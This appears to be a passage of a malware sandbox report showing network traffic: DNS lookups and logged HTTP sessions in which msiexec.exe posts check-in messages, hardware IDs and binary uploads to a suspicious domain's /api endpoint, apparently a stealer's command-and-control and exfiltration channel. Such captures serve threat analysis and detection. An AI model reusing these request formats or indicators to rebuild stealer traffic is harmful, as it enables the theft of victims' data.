                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823812962 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823844910 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823880911 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823889017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823918104 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823940039 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.824199915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.824237108 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.824259996 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.824279070 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.959291935 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.959397078 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.959502935 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.960879087 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.960910082 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.821669102 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.821899891 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.821949005 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.827045918 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.827064991 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.828553915 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.828640938 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.870871067 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.870969057 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.870976925 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.915332079 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.922705889 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.922739983 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:56.969646931 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.470923901 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.470985889 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471005917 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471054077 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471072912 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471088886 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471153021 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471209049 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.471239090 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.589972973 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.589996099 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.590043068 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.590096951 CET49718443192.168.2.16104.102.49.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.590172052 CET44349718104.102.49.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:57.590213060 CET49718443192.168.2.16104.102.49.254
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Nov 18, 2024 00:15:22.030877113 CET | 51109 | 53 | 192.168.2.16 | 1.1.1.1 |
| Nov 18, 2024 00:15:22.054672956 CET | 53 | 51109 | 1.1.1.1 | 192.168.2.16 |
| Nov 18, 2024 00:15:36.030801058 CET | 56388 | 53 | 192.168.2.16 | 1.1.1.1 |
| Nov 18, 2024 00:15:36.042140961 CET | 53 | 56388 | 1.1.1.1 | 192.168.2.16 |
| Nov 18, 2024 00:15:55.947199106 CET | 63445 | 53 | 192.168.2.16 | 1.1.1.1 |
| Nov 18, 2024 00:15:55.956815958 CET | 53 | 63445 | 1.1.1.1 | 192.168.2.16 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Nov 18, 2024 00:15:22.030877113 CET | 192.168.2.16 | 1.1.1.1 | 0x16dd | Standard query (0) | sliperyedhby.icu | A (IP address) | IN (0x0001) | false |
| Nov 18, 2024 00:15:36.030801058 CET | 192.168.2.16 | 1.1.1.1 | 0xacc6 | Standard query (0) | cdn1.pixel-story.shop | A (IP address) | IN (0x0001) | false |
| Nov 18, 2024 00:15:55.947199106 CET | 192.168.2.16 | 1.1.1.1 | 0x1093 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Nov 18, 2024 00:15:22.054672956 CET | 1.1.1.1 | 192.168.2.16 | 0x16dd | No error (0) | sliperyedhby.icu | | 172.67.131.254 | A (IP address) | IN (0x0001) | false |
| Nov 18, 2024 00:15:22.054672956 CET | 1.1.1.1 | 192.168.2.16 | 0x16dd | No error (0) | sliperyedhby.icu | | 104.21.4.107 | A (IP address) | IN (0x0001) | false |
| Nov 18, 2024 00:15:36.042140961 CET | 1.1.1.1 | 192.168.2.16 | 0xacc6 | No error (0) | cdn1.pixel-story.shop | | 172.67.185.54 | A (IP address) | IN (0x0001) | false |
| Nov 18, 2024 00:15:36.042140961 CET | 1.1.1.1 | 192.168.2.16 | 0xacc6 | No error (0) | cdn1.pixel-story.shop | | 104.21.32.85 | A (IP address) | IN (0x0001) | false |
| Nov 18, 2024 00:15:55.956815958 CET | 1.1.1.1 | 192.168.2.16 | 0x1093 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false |

                                                                                                                                                                                                                              • sliperyedhby.icu
                                                                                                                                                                                                                              • cdn1.pixel-story.shop
                                                                                                                                                                                                                              • steamcommunity.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.16 | 49704 | 172.67.131.254 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe |

Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:22 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sliperyedhby.icu
2024-11-17 23:15:22 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-11-17 23:15:23 UTC | 1015 | IN | HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 23:15:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=uuus5bvtfmk9tecd15lfv1qojd; expires=Thu, 13-Mar-2025 17:02:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r1S1OJQENmD3s6YaHc%2FZ2q2ZgoYab7oOB%2F1s%2FDZdUQKjMy0RQyLsrjwySIZ94Ulsw%2BjKcu5wOp9QkiYD%2BboFQRKmHP76tvtr%2B6gBxeAKKijXfWGmophmGX7%2BC4Dm7wp3kNiv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e436c236f5245e4-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1124&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=2637522&cwnd=250&unsent_bytes=0&cid=876f8af16511d3e8&ts=625&x=0"
2024-11-17 23:15:23 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-11-17 23:15:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.16 | 49706 | 172.67.131.254 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe |

Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:24 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 80
Host: sliperyedhby.icu
2024-11-17 23:15:24 UTC | 80 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 32 32 32 6e 65 77 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--222new&j=5c9b8674a630d9101b46733aa37f15ec
2024-11-17 23:15:24 UTC | 1006 | IN | HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 23:15:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=75j16csbr59333fsfuf8v7pg1c; expires=Thu, 13-Mar-2025 17:02:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UAVJplfG%2Fge3e%2BVQUH54p%2F34JMEyD8hSZdbcjN5x357v0lAgb3DTAXcEAK9V4gYof2YfgA3kaCXWQnz6t3KS%2B8BWGQPQQ13bgtEeLJFX39FBy2Teb5zhxATPyJZmJcFxEdP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e436c2c9db04791-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1882&sent=6&recv=7&lost=0&retrans=2&sent_bytes=5684&recv_bytes=980&delivery_rate=6928&cwnd=244&unsent_bytes=0&cid=85ccda21f6d3257a&ts=765&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 4a 57 43 2b 5a 58 41 2b 78 6a 70 76 56 6c 33 6a 78 4a 37 53 72 6b 4d 2b 73 6d 51 42 4e 56 6b 36 73 46 76 6e 49 2f 45 77 31 77 67 31 37 48 4b 4e 30 51 61 44 4a 6a 70 32 63 63 36 4e 79 38 61 4b 53 77 61 65 52 48 30 42 57 51 36 70 57 73 59 44 7a 55 33 6d 55 51 30 34 6e 6c 56 63 50 73 49 2b 65 32 5a 70 37 35 79 61 32 34 39 53 47 72 6f 31 4e 46 67 52 6c 72 6b 79 74 79 74 56 66 64 5a 31 64 53 6a 54 55 53 45 2b 6d 78 35 44 52 32 79 65 6a 4c 72 71 70 6b 38 57 67 6b 51 42 4f 54 55 4b 6b 58 72 71 41 36 56 56 2f 69 45 6c 5a 4c 70 74 64 42 62 65 4c 6d 4e 47 66 62 65 68 71 2f 2b 4f 64 33 75 6e 4e 54 57 35 50 57 34 35 45 70 63 6a 6b 47 6d 7a 61 53 6c 42 76 7a 42 63 49 73 34 61 57 31 35 31 30 35 69 65 78 70 70 44 42 70 5a 55 4e 54 55 4a 4c 6f 46 36 2f 68 50 64 58 65 4a
                                                                                                                                                                                                                              Data Ascii: JWC+ZXA+xjpvVl3jxJ7SrkM+smQBNVk6sFvnI/Ew1wg17HKN0QaDJjp2cc6Ny8aKSwaeRH0BWQ6pWsYDzU3mUQ04nlVcPsI+e2Zp75ya249SGro1NFgRlrkytytVfdZ1dSjTUSE+mx5DR2yejLrqpk8WgkQBOTUKkXrqA6VV/iElZLptdBbeLmNGfbehq/+Od3unNTW5PW45EpcjkGmzaSlBvzBcIs4aW15105iexppDBpZUNTUJLoF6/hPdXeJ
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 6b 6c 6b 41 75 59 75 61 6e 64 55 2f 35 44 4c 78 2b 39 72 68 73 35 67 4c 57 56 56 34 71 6c 62 6d 79 4f 51 61 62 4e 70 4b 55 47 2f 4d 46 77 79 7a 6a 5a 72 59 6e 33 66 6b 4b 62 43 76 6e 73 75 6b 6b 51 52 4b 51 56 2b 2f 55 4c 6d 49 39 46 70 36 6c 6c 39 53 4b 70 52 62 51 66 48 48 6b 4d 58 62 4a 36 4d 62 70 71 50 61 32 65 65 4d 54 55 6c 49 44 66 55 57 75 49 58 70 57 48 71 61 54 46 38 72 6e 31 41 48 75 59 61 55 32 4a 68 36 35 53 75 78 72 35 44 42 6f 5a 38 44 51 30 4a 4a 71 31 44 33 78 72 74 54 62 64 6f 56 48 42 32 5a 57 51 69 38 67 5a 72 4c 73 30 36 6a 4e 66 2b 36 32 73 47 6c 31 56 55 4f 51 45 61 6c 57 72 4b 41 2f 6c 56 39 6b 45 56 54 49 49 5a 57 44 72 61 41 6e 4e 43 55 63 65 59 6b 6f 36 53 52 7a 61 47 63 41 30 67 45 41 2b 31 52 72 38 69 6a 46 45 4f 5a 51 31 63
                                                                                                                                                                                                                              Data Ascii: klkAuYuandU/5DLx+9rhs5gLWVV4qlbmyOQabNpKUG/MFwyzjZrYn3fkKbCvnsukkQRKQV+/ULmI9Fp6ll9SKpRbQfHHkMXbJ6MbpqPa2eeMTUlIDfUWuIXpWHqaTF8rn1AHuYaU2Jh65Suxr5DBoZ8DQ0JJq1D3xrtTbdoVHB2ZWQi8gZrLs06jNf+62sGl1VUOQEalWrKA/lV9kEVTIIZWDraAnNCUceYko6SRzaGcA0gEA+1Rr8ijFEOZQ1c
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 36 32 47 6d 4a 33 56 50 2b 51 79 38 66 76 61 39 37 2b 53 43 6b 45 47 5a 4b 70 4e 74 6f 4c 34 58 33 6e 61 55 68 49 32 31 46 41 4e 2f 39 2f 58 30 4a 64 79 35 7a 69 39 6f 35 72 50 72 70 38 66 51 55 74 41 72 6c 61 79 6d 76 70 47 65 70 46 49 58 79 75 62 57 41 32 33 6a 64 65 54 32 33 6a 37 61 75 6e 6a 74 73 57 34 6e 30 39 70 58 6c 75 71 57 71 61 44 39 6c 67 31 68 51 4e 46 62 35 4e 62 51 65 66 48 6c 39 79 57 62 65 59 72 75 36 6d 58 7a 71 61 51 43 45 46 41 53 61 5a 59 70 59 62 30 56 48 4f 52 54 46 6b 73 6e 31 30 50 74 70 58 58 6b 39 74 34 2b 32 72 70 34 37 44 64 71 4a 67 42 44 47 70 47 75 31 48 31 71 66 56 66 63 70 5a 62 48 44 44 61 54 6b 47 34 69 39 65 46 32 33 62 74 4a 72 4b 6b 6b 73 36 73 6c 51 5a 4f 53 30 65 6a 55 61 57 43 39 31 35 6e 6c 55 35 52 4b 35 6c 64
                                                                                                                                                                                                                              Data Ascii: 62GmJ3VP+Qy8fva97+SCkEGZKpNtoL4X3naUhI21FAN/9/X0Jdy5zi9o5rPrp8fQUtArlaymvpGepFIXyubWA23jdeT23j7aunjtsW4n09pXluqWqaD9lg1hQNFb5NbQefHl9yWbeYru6mXzqaQCEFASaZYpYb0VHORTFksn10PtpXXk9t4+2rp47DdqJgBDGpGu1H1qfVfcpZbHDDaTkG4i9eF23btJrKkks6slQZOS0ejUaWC915nlU5RK5ld
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 6e 56 69 58 79 6a 5a 50 47 6b 67 6f 62 78 31 54 39 45 52 30 47 37 57 37 6a 49 35 42 70 73 32 6b 70 51 62 38 77 58 45 36 32 48 6e 4e 32 63 63 66 45 72 75 61 79 51 78 71 2b 65 42 30 31 4e 53 61 4e 66 73 59 6e 32 56 58 53 61 53 46 77 6d 68 6c 70 42 38 63 65 51 78 64 73 6e 6f 78 32 39 71 4b 76 46 76 39 55 53 41 46 30 4e 71 6c 72 33 30 4c 74 56 5a 35 64 46 57 43 2b 5a 55 51 71 2b 68 70 54 64 6d 33 7a 6a 4c 37 71 73 6e 4d 47 6b 6e 77 52 48 56 6b 57 70 52 4c 65 45 2f 78 51 37 32 6b 70 45 62 38 77 58 4d 62 79 4d 6d 39 32 57 61 71 4d 31 2f 37 72 61 77 61 58 56 56 51 35 4d 52 71 5a 51 76 49 76 34 57 6e 36 51 51 6c 4d 6c 6b 6c 45 4a 75 6f 65 62 33 5a 35 35 35 79 36 2f 70 4a 54 4c 71 49 63 4f 52 77 51 44 37 56 47 76 79 4b 4d 55 56 5a 46 62 57 53 69 43 46 54 53 38 69
                                                                                                                                                                                                                              Data Ascii: nViXyjZPGkgobx1T9ER0G7W7jI5Bps2kpQb8wXE62HnN2ccfEruayQxq+eB01NSaNfsYn2VXSaSFwmhlpB8ceQxdsnox29qKvFv9USAF0Nqlr30LtVZ5dFWC+ZUQq+hpTdm3zjL7qsnMGknwRHVkWpRLeE/xQ72kpEb8wXMbyMm92WaqM1/7rawaXVVQ5MRqZQvIv4Wn6QQlMlklEJuoeb3Z555y6/pJTLqIcORwQD7VGvyKMUVZFbWSiCFTS8i
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 75 39 53 6d 6e 70 4e 62 4f 75 4a 67 42 44 6e 73 44 37 55 37 33 30 4c 74 68 64 70 52 44 57 7a 6d 46 47 69 47 30 69 35 54 52 6d 6e 69 6a 5a 50 47 6c 32 70 37 36 32 30 31 4b 56 51 33 31 42 75 58 54 72 67 63 69 79 68 39 44 59 59 30 58 46 2f 2f 66 78 5a 50 62 62 61 4e 79 38 65 53 5a 31 4c 75 54 44 6c 68 48 43 70 4e 6f 74 6f 58 30 47 48 75 52 54 56 73 2f 67 6b 78 4e 74 34 53 4e 78 36 56 42 79 43 61 33 70 49 44 42 72 37 4d 74 44 67 6f 4e 6f 68 62 76 73 62 73 63 4e 61 55 44 48 44 66 55 44 30 47 4b 68 4a 6e 54 6e 47 6e 79 5a 35 6d 41 6f 50 7a 72 75 51 70 62 42 6e 6d 71 52 71 61 44 39 6c 67 31 31 41 31 61 62 38 77 48 54 2f 2b 44 68 70 33 44 4c 37 46 78 35 50 44 4e 6c 76 75 4b 51 31 63 45 57 2b 30 4f 35 63 61 37 52 6a 58 43 44 52 73 73 68 6b 55 48 76 4a 47 55 6d 71
                                                                                                                                                                                                                              Data Ascii: u9SmnpNbOuJgBDnsD7U730LthdpRDWzmFGiG0i5TRmnijZPGl2p76201KVQ31BuXTrgciyh9DYY0XF//fxZPbbaNy8eSZ1LuTDlhHCpNotoX0GHuRTVs/gkxNt4SNx6VByCa3pIDBr7MtDgoNohbvsbscNaUDHDfUD0GKhJnTnGnyZ5mAoPzruQpbBnmqRqaD9lg11A1ab8wHT/+Dhp3DL7Fx5PDNlvuKQ1cEW+0O5ca7RjXCDRsshkUHvJGUmq
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 73 4b 43 55 78 62 75 48 43 30 31 53 54 75 70 6f 69 61 33 32 57 58 43 55 53 6d 49 52 74 56 30 52 73 6f 69 51 6e 37 74 34 39 53 6d 50 6e 61 33 58 72 6f 56 50 61 45 64 62 72 68 62 35 79 4f 4d 55 4c 64 70 73 56 6a 2b 5a 57 41 62 39 70 35 44 4c 6d 44 2b 74 61 72 58 6a 77 6f 61 4d 6d 41 42 4c 53 6b 72 76 64 37 32 59 39 6c 74 79 32 47 31 62 4f 5a 63 58 54 2f 2b 4c 31 34 58 62 66 75 6b 36 76 4b 79 64 69 71 36 50 43 67 34 4b 44 61 4d 57 37 38 6a 36 58 6d 57 58 51 6c 74 6a 6b 6c 6b 50 2f 35 6a 5a 78 4e 74 70 6f 33 4c 69 37 64 72 55 36 63 31 4e 43 55 64 66 76 31 43 30 6e 76 67 54 53 36 52 67 54 69 69 45 56 45 4f 4f 69 70 50 4c 6a 6e 7a 7a 4c 59 2b 64 74 39 53 75 68 51 34 4d 64 56 75 75 56 72 6d 50 75 78 6f 31 67 67 30 45 62 37 6c 46 42 71 2b 45 31 38 4c 56 5a 71 4d
                                                                                                                                                                                                                              Data Ascii: sKCUxbuHC01STupoia32WXCUSmIRtV0RsoiQn7t49SmPna3XroVPaEdbrhb5yOMULdpsVj+ZWAb9p5DLmD+tarXjwoaMmABLSkrvd72Y9lty2G1bOZcXT/+L14Xbfuk6vKydiq6PCg4KDaMW78j6XmWXQltjklkP/5jZxNtpo3Li7drU6c1NCUdfv1C0nvgTS6RgTiiEVEOOipPLjnzzLY+dt9SuhQ4MdVuuVrmPuxo1gg0Eb7lFBq+E18LVZqM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.16 | 49707 | 172.67.131.254 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:25 UTC | 283 | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=ZWV2Y3KCN3COQ12661G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12851
Host: sliperyedhby.icu
2024-11-17 23:15:25 UTC | 12851 | OUT
Data Ascii: --ZWV2Y3KCN3COQ12661GContent-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--ZWV2Y3KCN3COQ12661GContent-Disposition: form-data; name="pid"2--ZWV2Y3KCN3COQ12661GContent-Disposition: form-data; name="lid"tLYMe5--22
2024-11-17 23:15:26 UTC | 1017 | IN
HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 23:15:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=bqaqal0sdcdagap50r9v1lc7li; expires=Thu, 13-Mar-2025 17:02:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VkxAe6aKty%2B1yFXUodUCw1gI70DK46kvnQw4XSuL%2BsV6jqDFwLyL%2BD8rQCHy4tDrdy5m9wr%2BGu%2FUIfkCIVVTM1plGiKMdI82xD4LSR%2FL8tKs9mDIYzes22OgayS%2BAOtOXqLZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e436c377f8251ef-DEN
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=18917&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13792&delivery_rate=153033&cwnd=32&unsent_bytes=0&cid=5c5850a13d2cafee&ts=614&x=0"
2024-11-17 23:15:26 UTC | 23 | IN
Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
Data Ascii: 11ok 173.254.250.70
2024-11-17 23:15:26 UTC | 5 | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.16 | 49708 | 172.67.131.254 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:27 UTC | 276 | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=4CWKL50BXAXU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15044
Host: sliperyedhby.icu
2024-11-17 23:15:27 UTC | 15044 | OUT
Data Ascii: --4CWKL50BXAXUContent-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--4CWKL50BXAXUContent-Disposition: form-data; name="pid"2--4CWKL50BXAXUContent-Disposition: form-data; name="lid"tLYMe5--222new--4CWKL50BXAXU
2024-11-17 23:15:27 UTC | 1011 | IN
HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 23:15:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=c4rdcr3uimjm89n0ldusaequbr; expires=Thu, 13-Mar-2025 17:02:06 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0lVTjtsrcZtuWzm5MHD7R4BtY4se1scH6p0zDOQ0TlANyvm0vhgc0%2Bp3Urb2vfIiHE3tFJN%2FM8meIIXDKE9y%2FOW2RgUh5QIXCZfeQpKqSiRG9LTu8a0rVpfRCooVh6qcZAyk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e436c407e6a6b0a-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1851&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2842&recv_bytes=15978&delivery_rate=1544533&cwnd=251&unsent_bytes=0&cid=5df180f29fded59b&ts=603&x=0"
2024-11-17 23:15:27 UTC | 23 | IN
Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
Data Ascii: 11ok 173.254.250.70
2024-11-17 23:15:27 UTC | 5 | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.16 | 49709 | 172.67.131.254 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:28 UTC | 283 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=WQY78TW6YBE83BZ74EO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20429
Host: sliperyedhby.icu
2024-11-17 23:15:28 UTC | 15331 | OUT | Data Ascii: --WQY78TW6YBE83BZ74EOContent-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--WQY78TW6YBE83BZ74EOContent-Disposition: form-data; name="pid"3--WQY78TW6YBE83BZ74EOContent-Disposition: form-data; name="lid"tLYMe5--22
2024-11-17 23:15:28 UTC | 5098 | OUT | Data Ascii: (X&7~`aO`,li`M?lrQMn 64
2024-11-17 23:15:29 UTC | 1013 | IN | HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 23:15:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7g2p7rjuc9uea2quovdhfkkv3t; expires=Thu, 13-Mar-2025 17:02:08 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
